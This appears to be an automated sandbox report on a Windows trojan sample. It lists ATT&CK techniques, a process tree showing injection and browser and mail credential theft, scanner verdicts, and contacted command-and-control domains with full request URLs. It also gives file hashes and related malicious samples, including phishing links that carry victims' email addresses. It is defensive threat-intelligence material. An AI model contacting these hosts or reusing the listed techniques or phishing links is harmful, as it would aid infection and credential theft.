                Source: Yara match | File source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1475272 | Sample: nK1Y86mbzfbkwpB.exe | Startdate: 17/07/2024 | Architecture: WINDOWS | Score: 100

                Start (2)
                  DNS/IP: www.techacademy.store; www.scottifqqy.online; 8 other IPs or domains
                  Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 11 other signatures
                  nK1Y86mbzfbkwpB.exe (10, started)
                    Dropped: C:\Users\user\AppData\Roaming\GDhinOc.exe (PE32); C:\Users\user\...\GDhinOc.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp100A.tmp (XML); C:\Users\user\...\nK1Y86mbzfbkwpB.exe.log (ASCII)
                    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                    RegSvcs.exe (16, started): Maps a DLL or memory area into another process
                      hAtMBptzWt.exe (31, injected)
                        runas.exe (44, started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          hAtMBptzWt.exe (49, injected): Found direct / indirect Syscall (likely to bypass EDR)
                            DNS/IP: www.scottifqqy.online 185.179.189.181, 63893, 80, WEBHOST1-ASRU Russian Federation; ancuapengiu28.com 172.96.191.69, 63895, 63896, 63897, LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada; 2 other IPs or domains
                          firefox.exe (53, started)
                    powershell.exe (19, started): Loading BitLocker PowerShell Module
                      WmiPrvSE.exe (33, started)
                      conhost.exe (35, started)
                    schtasks.exe (21, started)
                      conhost.exe (37, started)
                  GDhinOc.exe (14, started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    RegSvcs.exe (23, started)
                      hAtMBptzWt.exe (39, injected): Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
                        runas.exe (47, started)
                    schtasks.exe (25, started)
                      conhost.exe (42, started)
                    RegSvcs.exe (27, started)
                    RegSvcs.exe (29, started)

                Source | Detection | Scanner | Label
                nK1Y86mbzfbkwpB.exe | 53% | ReversingLabs | Win32.Trojan.Nekark
                nK1Y86mbzfbkwpB.exe | 100% | Avira | HEUR/AGEN.1362865
                nK1Y86mbzfbkwpB.exe | 100% | Joe Sandbox ML |
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\GDhinOc.exe | 100% | Avira | HEUR/AGEN.1362865
                C:\Users\user\AppData\Roaming\GDhinOc.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\GDhinOc.exe | 53% | ReversingLabs | Win32.Trojan.Nekark
                No Antivirus matches
                No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
http://www.goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-l | true | Avira URL Cloud: safe | unknown
http://www.goodneighbor.club/qt04/ | true | Avira URL Cloud: safe | unknown
http://www.ancuapengiu28.com/d3vb/ | true | Avira URL Cloud: safe | unknown
http://www.techacademy.store/cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l | true | Avira URL Cloud: safe | unknown
http://www.techacademy.store/cf3x/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn | runas.exe, 00000011.00000002.3358247281.000000000539A000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000002.3357539718.000000000322A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | nK1Y86mbzfbkwpB.exe, 00000000.00000002.2180682154.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, GDhinOc.exe, 00000008.00000002.2407319175.0000000002B47000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.dr | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodneighbor.club | hAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.techacademy.store | United States | 16509 | AMAZON-02US | true
162.159.134.42 | goodneighbor.club | United States | 13335 | CLOUDFLARENETUS | true
172.96.191.69 | ancuapengiu28.com | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
185.179.189.181 | www.scottifqqy.online | Russian Federation | 44094 | WEBHOST1-ASRU | true
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1475272
                                  Start date and time:2024-07-17 18:58:04 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:3
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:nK1Y86mbzfbkwpB.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@26/12@6/4
                                  EGA Information:
                                  • Successful, ratio: 83.3%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 147
                                  • Number of non-executed functions: 327
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target hAtMBptzWt.exe, PID 3172 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: nK1Y86mbzfbkwpB.exe
Time | Type | Description
12:58:52 | API Interceptor | 1x Sleep call for process: nK1Y86mbzfbkwpB.exe modified
12:58:58 | API Interceptor | 16x Sleep call for process: powershell.exe modified
12:59:01 | API Interceptor | 1x Sleep call for process: GDhinOc.exe modified
13:00:18 | API Interceptor | 822664x Sleep call for process: runas.exe modified
18:58:58 | Task Scheduler | Run new task: GDhinOc path: C:\Users\user\AppData\Roaming\GDhinOc.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exe | malicious | FormBook, PureLog Stealer | www.ansverity.com/7llb/
13.248.169.48 | OrderPI.exe | malicious | FormBook | www.cetys.com/6uii/
13.248.169.48 | PO HA25622.exe | malicious | FormBook | www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
13.248.169.48 | IMG_00110724.exe | malicious | FormBook | www.ansverity.com/7llb/
13.248.169.48 | SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exe | malicious | FormBook | www.ansverity.com/7llb/
13.248.169.48 | Shipping Documents.exe | malicious | FormBook | www.ansverity.com/7llb/
13.248.169.48 | PTT Group project - Quotation.exe | malicious | FormBook | www.webuyfontana.com/cns4/
13.248.169.48 | 80TeZdsbeA6B6j4.exe | malicious | FormBook | www.realtors.biz/mc10/?ejn=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/XlvHoWwQQ/&vVjLC=M6Ah
13.248.169.48 | RFQ - MK FMHS.RFQ.24.101.exe | malicious | FormBook | www.webuyfontana.com/cns4/
13.248.169.48 | disjR92Xrrnc3aZ.exe | malicious | FormBook | www.realtors.biz/mc10/?FPWhWLW=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/bcjmEWnWMuFtbCmA==&AlB=8pdT8tsp
162.159.134.42 | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | www.goodneighbor.club/arws/
162.159.134.42 | CC-CREDIT CARD-itineraries.exe | malicious | FormBook | www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
162.159.134.42 | http://heritageconsultants.com | malicious | Unknown | heritageconsultants.com/
162.159.134.42 | http://www.heritageconsultants.com/ | malicious | Unknown | www.heritageconsultants.com/
162.159.134.42 | http://www.standardmediaindex.com | malicious | Unknown | www.standardmediaindex.com/
162.159.134.42 | sCzFNAYGKI.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader | redrivergorge.com/admin
162.159.134.42 | 3yPvcmrbqS.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz | directa-plus.com/administrator/
162.159.134.42 | Documents.exe | malicious | FormBook | www.shufiya.com/gd12/?DPZl=5jUDTf-HoZs&R0Gh=4IUdDy7qYcz3Aj6r2+dL3f372ATDValOWy994H4bQvMIP2krqm+IJVbZ16vdXjwxdhOF
162.159.134.42 | php.ini | malicious | Unknown | thefortcollins.dentist/
162.159.134.42 | graph.exe | malicious | Unknown | www.filmworkz.com/toolport/ver.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
natroredirect.natrocdn.com | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | 85.159.66.93
natroredirect.natrocdn.com | INV90097.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | 85.159.66.93
natroredirect.natrocdn.com | AWB 112-17259653.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | 85.159.66.93
natroredirect.natrocdn.com | Document TOP19928.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | U prilogu lista novih narudzbi.exe | malicious | DBatLoader, FormBook | 85.159.66.93
natroredirect.natrocdn.com | wOoESPII08.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | opp46lGmxd.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | mzrHGroQZy.hta | malicious | FormBook | 85.159.66.93
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WEBHOST1-ASRU | https://tr.alertsgame.ru/ | malicious | Unknown | 91.236.136.126
WEBHOST1-ASRU | https://tr.alertsgame.ru/ | malicious | Unknown | 91.236.136.126
WEBHOST1-ASRU | https://tr.alertsgame.ru/ | malicious | Unknown | 91.236.136.126
WEBHOST1-ASRU | https://tr.alertsgame.ru/ | malicious | Unknown | 91.236.136.126
WEBHOST1-ASRU | LockyRansom.exe | malicious | Unknown | 185.179.190.31
WEBHOST1-ASRU | LockyRansom.exe | malicious | Unknown | 185.179.190.31
WEBHOST1-ASRU | Nitro.exe | malicious | AsyncRAT | 45.84.1.233
WEBHOST1-ASRU | SecuriteInfo.com.Win32.Evo-gen.26417.20881.exe | malicious | AsyncRAT | 45.84.1.233
WEBHOST1-ASRU | zY7L2l2Gt6.exe | malicious | NetSupport RAT | 45.67.230.205
WEBHOST1-ASRU | zY7L2l2Gt6.exe | malicious | NetSupport RAT | 45.67.230.205
AMAZON-02US | https://i.mqz7or.com/l/#1barry.doan@firstontario.com | malicious | Tycoon2FA | 13.32.145.9
AMAZON-02US | https://o.mqz7or.com/y/#7cynthia.crappere@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 108.156.39.22
AMAZON-02US | https://5.rcestershir.com/u/#abernadette.rigo@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 3.162.38.104
AMAZON-02US | https://5.rcestershir.com/u/#abernadette.rigo@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 13.33.187.96
AMAZON-02US | file.exe | malicious | Unknown | 3.165.136.19
AMAZON-02US | file.exe | malicious | Unknown | 3.165.136.26
AMAZON-02US | https://trk.klclick3.com/ls/click?upn=u001.I9LhpOxgCcXrD8xJgdEO8WUi5tV6wurQhjXRfDAEMS-2FcMa0g0FTnahsI5IEFHinKC-2FGj8kpAqnaoI6Qoa3vFLySKKSAfv0Wxu2Dy-2BRyMntsvwfzFfHILPHPRV90LmePFgMglDqCtK67PLGfWxTEMO93TwkvZZtNoI477LbXPoBjcrwXEgXl1dr5-2Bsbz8VZiUNXN768BEIA-2BYnNr4FIu9nA-3D-3DATse_RSmWOI3fPdFDxAydigDPQ0uJwuQ-2FUs3Wu1xZT2pFOHtvwUa8-2Ftks3ld44BID-2BJgD3ps4M8U7HlIP10yVJ6ZeFvrA3iSG0rco-2Fzt7OL4FXId6TCwVFcQcW-2F2E-2Faa3q7Weo2xYvFD1h9l7jEVdzkUp4Kp77hFD1XYDRoeiAzaz-2BFA4Srg7EiFD-2BO6F2w7c4O0pEK7boN40RNA-2F8TusPddYFOH48pk30jzUw7CYeSygfO9hZkczhRjxavPfa15ZQShZu24zwPQtiM5rYtaL0zKZeMvKbYsdrel3rTSJBLKXR2MMcVfiOQJo1JHVPclcvULrA5xewzIBFupBKpLaDZv1KWbZjd-2F-2BEE4MzV1Vme-2FCaJxOXBca4gsTghUHHiiDIxlLzjYnWoXwKNHeSslKR-2BUfUjOwwSmF8fN79-2FzJVuaw4lasmT9EvZxZK-2BAH7JlY5rrgFg8Woxh0SAeruKYO5LevAgBmW3c5sr-2F85S8FCROz5cY3UDqnpYtBxr1o9XTEZg-2FV#O07qxE-SUREJACKbXJvbWVyb0BkYWlpY2hpLXNhbmt5by5ldQ== | malicious | Unknown | 108.156.60.30
AMAZON-02US | https://sharepoint-capcounsel.com/ | malicious | HTMLPhisher | 18.184.193.10
AMAZON-02US | https://links.aimarketupdates.com/u/click?_t=007c8d3169964357a567583be3759899&_m=4ea0ea1bd832476385a969490a2fc97e&_e=eqsHaQzsqtuCBU4cjDCgp01WTMG-_xF0_zPeEcn5TvgDliLiLzqmrOFu6PEmBd8l4eUowEbdY2HGbDEt0pGnvEt7kjHrlvXxoLxfE46OIlHNWu3diefrdA7VS-gvhlNeWXcmQJcb-K5SDaQZbQTwGQd5isj6R3r0VBDsOI-iTGQ1hbpwPmIGeddjCGhSb-v2SlYhA9ojX30WJ8x3W4eetXB2bx4euqlvMaP3t67I57cNYUuRHdJVlmbD-MEaYgYSIcCMgwVQNnqQsJbZ-9kf6iTd94Y2-7Qbkwx6Pc2XEaA%3D | malicious | Unknown | 52.33.181.156
AMAZON-02US | http://appliedcryotech.com | malicious | Unknown | 54.247.172.86
CLOUDFLARENETUS | swiftcopy_dg2s7veypnpdql9xfoys.rtf | malicious | Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | swiftcopy_dg2s7veypnpdql9xfoys.rtf | malicious | Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | https://i.mqz7or.com/l/#1barry.doan@firstontario.com | malicious | Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | p_view_20241106.pdf | malicious | Unknown | 104.26.15.225
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PackedNET.2979.30935.7426.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://o.mqz7or.com/y/#7cynthia.crappere@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | swiftcopy_3fnmfcx1jx6ynxrhldz2.rtf | malicious | Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | https://5.rcestershir.com/u/#abernadette.rigo@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | Doc 0001_RFQ _MV_Vilnius provision.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | https://5.rcestershir.com/u/#abernadette.rigo@firstontario.com | malicious | HTMLPhisher, Tycoon2FA | 188.114.96.3
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | Your file name without extension goes here.exe | malicious | FormBook | 209.58.164.109
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | HSBC Bank_Approvel Letter.exe | malicious | FormBook | 209.58.164.109
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | https://103.150.10.45:8443/ | malicious | Unknown | 103.150.10.45
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PHHOjspjmp.exe | malicious | CMSBrute | 209.58.180.90
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | FEB-MAR SOA 2024.exe | malicious | AgentTesla | 172.96.191.121
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | YHZj3QW0oh.exe | malicious | Remcos | 23.106.121.144
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | w0vFb4jHKs.exe | malicious | Remcos | 23.106.121.144
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | CITIBANK EUROPE PLC. SWIFT TRANSFER (008) CMSWT24019000690.exe | malicious | Remcos | 23.106.121.133
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | Swift copy of payment.exe | malicious | Remcos | 23.106.121.133
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PQ84eqzrOt.exe | malicious | Remcos | 23.106.121.144
                                  Process:C:\Users\user\AppData\Roaming\GDhinOc.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:true
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2232
                                  Entropy (8bit):5.3797706053345555
                                  Encrypted:false
                                  SSDEEP:48:fWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:fLHxv2IfLZ2KRH6Oug8s
                                  MD5:9FF3AC33DFACF1D94AB100EAED9F43DF
                                  SHA1:EFE2AD786E0EE6208CE0353B5E1B3BF530C37508
                                  SHA-256:A94507C64061985F19C9C30947B00BC871FA8754D885979B5127094AA46D794D
                                  SHA-512:E2166B321C3546C88698F6B781FEF640E394890E53D43C75EA3A8AED0FA934BC3C2B8DA816296C9BE04947374C1CB87B84FCEF535EED45B44AED7854E5CAD6FA
                                  Malicious:false
                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                  Process:C:\Windows\SysWOW64\runas.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                  Category:dropped
                                  Size (bytes):196608
                                  Entropy (8bit):1.1239949490932863
                                  Encrypted:false
                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                  MD5:271D5F995996735B01672CF227C81C17
